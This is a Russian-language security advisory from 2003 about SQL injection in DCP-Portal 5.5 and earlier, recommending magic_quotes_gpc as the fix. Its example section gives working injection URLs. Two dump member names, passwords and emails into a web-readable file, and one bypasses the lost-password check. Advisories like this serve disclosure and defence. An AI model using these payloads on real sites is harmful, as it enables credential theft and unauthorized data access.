Sql инъекция в DCP-Portal

Дата публикации:
03.10.2003
Всего просмотров:
1340
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: DCP-Portal 5.5 и более ранние версии

Описание: Уязвимость обнаружена в DCP-Portal 5.x. Удаленный атакующий может выполнить произвольный SQL код на основной базе данных.

DCP-Portal не проверяет данные, представленные пользователем, перед передачей их к динамическому SQL запросу в различных параметрах и сценариях. В результате удаленный пользователь может манипулировать SQL запросом, чтобы обойти идентификацию, манипулировать данными и извлекать произвольные данные.

Пример/Эксплоит:

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 
1=1 UNION select uid,name,password,surname,job,email from dcp5_members 
into outfile 'c:/apache2/htdocs/dcpad.txt

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 
1=1 UNION select uid,name,password,surname,job,email from dcp5_members
into outfile '/var/www/html/dcpad.txt

http://localhost/dcp/lostpassword.php?action=lost&email=fake' or 1=1--'

URL производителя: http://www.dcp-portal.com

Решение:Включите magic_quotes_gpc в php.ini файле.

Ссылки: DCP Portal - 5.5 holes

или введите имя

CAPTCHA